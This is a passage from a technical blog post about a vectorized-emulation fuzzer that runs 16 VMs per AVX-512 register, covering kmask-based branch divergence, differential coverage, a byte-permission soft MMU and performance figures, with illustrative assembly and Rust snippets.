; for VMs which are enabled by `k1` and also have a non-zero value.
; TL;DR: k2 contains a mask of VMs which will be taking `ftgt`
vptestmd k2 {k1}, val, val

; Store the true branch target unconditionally, while not clobbering
; VMs which have been disabled
vmovdqa32 zmm31 {k1}, ttgt

; Store the false branch target for VMs not taking the branch
; Note the use of k2
vmovdqa32 zmm31 {k2}, ftgt

; At this point `zmm31` contains the targets for all VMs. Including ones
; that previously got disabled.

; Broadcast the target that VM #0 wants to take to all lanes in `zmm0`
vpbroadcastd zmm0, xmm31

; Compute a new kmask of which represents all VMs which are going to
; the same location as VM #0
vpcmpeqd k1, zmm0, zmm31

; ...
; Now just rip out the target for VM #0 and translate the guest address
; into the host JIT address and jump there.
; Or break out and generate the JIT if it hasn't been hit before

The above code is quite fast and isn’t a huge performance issue, especially as we’re running 16 VMs at a time and branches are “rare” with respect to expensive operations like memory loads and stores.

One thing that is important to note is that zmm31 always contains the last desired branch target for a given VM. Even after it has been disabled. This means that it is possible for a VM which has been disabled to come back online if VM #0 ends up going to the same location.

Let’s go through a more thorough example:

; Register allocation:
; ebx - Pointer to some user controlled buffer
; ecx - Length of controlled buffer

; Validate buffer size
cmp ecx, 4
jne .end

; Fallthrough
.next:

; Check some magic from the buffer
cmp dword ptr [ebx], 0x13371337
jne .end

; Fallthrough
.next2:

; Unconditionally jump to .end, for clarity
jmp .end

.end:

And the theoretical vectorized output (not actual JIT output):

; Register allocation:
; zmm10 - ebx
; zmm11 - ecx
; k1    - The execution kmask, this is the kmask used on all JITted instructions
; k2    - Temporary kmask, just used for scratch
; zmm0  - Scratch register
; zmm8  - Scratch register
; zmm31 - Desired branch target for all lanes

; Compute kmask register for VMs which have `ecx` == 4
vpcmpeqd k2 {k1}, zmm11, dword ptr [memory containing 4] {1to16}

; Update zmm31 to reference the respective branch target
vmovdqa32 zmm31 {k1}, address of .end  ; By default we go to end
vmovdqa32 zmm31 {k2}, address of .next ; If `ecx` == 4, go to .next

; Broadcast the target that VM #0 wants to take to all lanes in `zmm0`
vpbroadcastd zmm0, xmm31

; Compute a new kmask of which represents all VMs which are going to
; the same location as VM #0
vpcmpeqd k1, zmm0, zmm31

; Branch to where VM #0 is going (simplified)
jmp where_vm0_wants_to_go

.next:

; Magicially load memory at ebx (zmm10) into zmm8
vmovdqa32 zmm8, complex_mmu_operation_and_stuff

; Compute kmask register for VMs which have packet contents 0x13371337
vpcmpeqd k2 {k1}, zmm8, dword ptr [memory containing 0x13371337] {1to16}

; Go to .next2 if memory is 0x13371337, else go to .end
vmovdqa32 zmm31 {k1}, address of .end   ; By default we go to end
vmovdqa32 zmm31 {k2}, address of .next2 ; If contents == 0x13371337 .next2

; Broadcast the target that VM #0 wants to take to all lanes in `zmm0`
vpbroadcastd zmm0, xmm31

; Compute a new kmask of which represents all VMs which are going to
; the same location as VM #0
vpcmpeqd k1, zmm0, zmm31

; Branch to where VM #0 is going (simplified)
jmp where_vm0_wants_to_go

.next2:

; Everyone still executing is unconditionally going to .end
vmovdqa32 zmm31 {k1}, address of .end

; Broadcast the target that VM #0 wants to take to all lanes in `zmm0`
vpbroadcastd zmm0, xmm31

; Compute a new kmask of which represents all VMs which are going to
; the same location as VM #0
vpcmpeqd k1, zmm0, zmm31

.end:

Okay so what does the VM state look like for a theoretical version (simplified to 4 VMs):

Starting state, all VMs enabled with different memory contents (pointed to by ebx) and different packet lengths:

Register VM 0 VM 1 VM 2 VM 3
ecx 4 3 4 4
memory 0x13371337 0x13371337 3 0x13371337
K1 1 1 1 1

First branch, all VMs with ecx != 4 are disabled and are pending branches to .end, VM #1 falls off

Register VM 0 VM 1 VM 2 VM 3
ecx 4 3 4 4
memory 0x13371337 0x13371337 3 0x13371337
K1 1 0 1 1
Zmm31 .next .end .next .next

Second branch, VMs without 0x13371337 in memory are pending branches to .end, VM #2 falls off

Register VM 0 VM 1 VM 2 VM 3
ecx 4 3 4 4
memory 0x13371337 0x13371337 3 0x13371337
K1 1 0 0 1
Zmm31 .next2 .end .end .next2

Final branch, everyone ends up at .end, all VMs are enabled again as they’re following VM #0 to .end

Register VM 0 VM 1 VM 2 VM 3
ecx 4 3 4 4
memory 0x13371337 0x13371337 3 0x13371337
K1 1 1 1 1
Zmm31 .end .end .end .end

Branch summary

So we saw branches will disable VMs which do not follow VM #0. When VMs are disabled all modifications to their register states or memory states are blocked by hardware. The kmask mechanism allows us to keep performance up and not use different JITs based on different branch states.

Further, VMs can come back online if they were pending to go to a location which VM #0 eventually ends up going to.

Exceptions/faults

These are really just glorified branches with a VM exit to save the input and memory/register state related to the crash. No reason to really go in depth here.



Okay but why?

Okay we’ve covered all the very high level details of how vectorized emulation is possible but that’s just academic thought. It’s pointless unless it accomplishes something.

At this point all of the next topics are going to be their own blogs and thus are only lightly touched on.

Differential coverage / Hardware accelerated taint tracking

Differential coverage is a special type of coverage that we are able to gather with this vectorized emulation model. This is the most important aspect of all of this tooling and is the main reason it is worth doing.

Since we are running 16 VMs at a time we are able to very cheaply (a few cycles) do a horizontal comparison with other VMs. Since VMs are deterministic and only have differing user-controlled inputs any situation where VMs have different branches, different register states, different memory states, etc is when the user input directly or indirectly caused a change in behavior.

I would consider this to be the holy grail of coverage. Any effect the input has on program state we can easily and cheaply detect.

How differential coverage combats state explosion

If we wanted to track all register states for all instructions the state explosion would be way too huge. This can be somewhat capped by limiting the amount of state each instruction can generate. For example instead of storing all unique register values for an instruction we could simply store the minimums and maximums, or store up to n unique values, etc. However even when limited to just a few values per instruction, the state explosion is too large for any real application.

However, since most memory and register states are not influenced by user input, with differential coverage we can greatly reduce the number of instructions for which state is stored, as we only store state that was influenced by user data.

This works for code coverage as well; for example, if we hit a printf with completely uncontrolled parameters, that would register as potentially hundreds of new blocks of coverage. With differential coverage all of this state can be ignored.

How differential coverage is great for performance

While the focus of this tool is not performance, updating databases on every instruction is simply not feasible. By filtering down to only the instructions which touch user-influenced data we’re able to perform much more complex operations in the cases where new coverage was detected.

For example all of my register loads and stores start with a horizontal compare and a quick jump out if they all match. If one differs it’s a rare enough occasion that it’s feasible to spend a few more cycles to do a hash calculation based on state and insertion into the global input and coverage databases. Without differential coverage I would have to unconditionally do this every instruction.
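
A plain Rust sketch of that check (names are mine; the real thing is a couple of JIT-emitted AVX-512 instructions): compare every lane against VM #0 and only take the expensive bookkeeping path when something actually differs.

const LANES: usize = 16;

// True if any lane's value differs from VM #0's value
fn lanes_diverge(values: &[u32; LANES]) -> bool {
    let leader = values[0];
    values.iter().any(|&v| v != leader)
}

fn on_register_store(values: &[u32; LANES]) {
    if lanes_diverge(values) {
        // Rare path: user input influenced this state, hash it and update
        // the coverage/input databases
        record_divergence(values);
    }
    // Common path: all lanes identical, nothing to record, fall through
}

fn record_divergence(_values: &[u32; LANES]) {
    // Placeholder for the database insertion described above
}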

Soft MMU

Since the soft MMU deserves an entire blog of its own, we’ll just go slightly into the details.

As mentioned before, we interleave memory at the dword level, but for every byte there is also a corresponding permission byte. In memory this looks like 16 32-bit dwords representing the permissions, followed by 16 32-bit dwords containing their corresponding memory contents. This allows me to read a 64-byte cache line with the permissions which are checked first, followed by reading the 64-byte cache line directly following with the contents.

For permissions: the read, write, and execute bits are completely separate. This allows more exotic memory models like execute-only memory.

Since permissions are at the byte level, this means we can punch a one-byte hole anywhere in memory and accessing that byte would cause a fault. For some targets I’ll do special modifications to permissions and punch holes in unused or padding fields of structures to catch overflows of buffers contained inside structures.

Further I have a special read-after-write (RaW) bit, which is used to mark memory as uninitialized. Memory returned from allocators is marked as RaW and thus will fault if ever read before written to. This is tracked at the byte level and is one of the most useful features of the MMU. We’ll talk about how this can be made fast in a subsequent blog.
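
As a rough sketch of what byte-level permissions with a RaW bit could look like (the bit assignments and names here are assumptions for illustration, not the actual MMU layout):

const PERM_READ:  u8 = 1 << 0;
const PERM_WRITE: u8 = 1 << 1;
const PERM_EXEC:  u8 = 1 << 2;
const PERM_RAW:   u8 = 1 << 3; // read-after-write: must be written before read

// Fault if the byte is uninitialized (RaW) or simply not readable
fn check_read(perm: u8) -> Result<(), &'static str> {
    if perm & PERM_RAW != 0 {
        return Err("read of uninitialized (RaW) memory");
    }
    if perm & PERM_READ == 0 {
        return Err("read of non-readable memory");
    }
    Ok(())
}

// A successful write clears the RaW bit so later reads are allowed
fn apply_write(perm: &mut u8) -> Result<(), &'static str> {
    if *perm & PERM_WRITE == 0 {
        return Err("write to non-writable memory");
    }
    *perm &= !PERM_RAW;
    Ok(())
}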

Performance

Performance is not the goal of this project, however the numbers are a bit better than expected from the theorycrafting.

In reality it’s possible to hit up to 2 trillion emulated instructions per second, which is the clickbait title of this blog. However this is on a 32-deep unrolled loop that is just adding numbers and not hitting memory. This unrolling makes the branch divergence checking costs disappear, and integer operations are almost a 1-to-1 translation into AVX-512 instructions.

For a real target the numbers are more in the 40 billion to 120 billion emulated instructions per second range. For a real target like OpenBSD’s DHCP client I’m able to do just over 5 million fuzz cases per second (fuzz case is one DHCP transaction, typically 1 or 2 packets). For this specific target the emulation speed is 54 billion instructions per second. This is while gathering PC-level coverage and all register and memory divergence coverage.

So it’s just academic?

I’ve been working on this tooling for almost 2 years now and it’s been usable since month 3. It’s my primary tool for fuzzing and has successfully found bugs in various targets. Sadly most of these bugs are not public yet, but soon.

This tool was used to find a remote bluescreen in Windows Firewall: CVE-2018-8206 (okay technically I found it first manually, but was able to find it with the fuzzer with a byte flipper even though it has much more complex constraints)

It was also used to find a theoretical OOB in OpenBSD’s dhclient: dhclient bug. This is a fun one as really no traditional fuzzer would find this, as it’s an out-of-bounds by 1 inside of a structure.

Future blogs

  • Description of the IL used, as it’s got some specific designs for vectorized emulation

  • Internal details of the MMU implementation

  • Showing the power of differential coverage by looking at a real example of fuzzing an HTTP parser and having a byte flipper quickly (under 5 seconds) find the basic "VERB HTTP/number.number\r\n". No magic, no `strings` feedback, no static analysis. Just a useless fuzzer with strong harnessing.

  • Talk about the new IL which handles graphs and can do cross-block optimizations

  • Showing better branch divergence handling via post-dominator analysis and stepping VMs until they sync up at a known future merge point
